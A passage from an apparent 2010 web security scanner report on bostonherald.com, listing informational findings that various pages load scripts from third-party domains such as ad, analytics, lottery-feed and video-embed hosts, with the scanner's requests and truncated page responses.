<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.68. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:28:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.69. http://bostonherald.com/lottery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/lottery/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.playlottery247.com/feed/jp/topjp_fmt1.js
http://www.playlottery247.com/js/ldc_feed.js
http://www.playlottery247.com/js/usmaps/uscanada_416x302.js

Request

GET /lottery/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:41:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<link rel=STYLESHEET href="http://www.playlottery247.com/css/LS_A.css" type="text/css">
<script language="JAVASCRIPT" src="http://www.playlottery247.com/js/ldc_feed.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/js/usmaps/uscanada_416x302.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/feed/jp/topjp_fmt1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.70. http://bostonherald.com/mediacenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=531
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /mediacenter/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

9.71. http://bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=986
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /mediacenter/index.php HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 442463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>

                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=986" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</body>

       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

9.72. http://bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=445
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.73. http://bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

9.74. http://bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://objects.tremormedia.com/embed/js/_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:26:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2341
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/_p.js"></script>
...[SNIP]...

9.75. http://bostonherald.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /news/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:20:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.76. http://bostonherald.com/news/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/columnists/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:23:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.77. http://bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.78. http://bostonherald.com/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:26:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46697

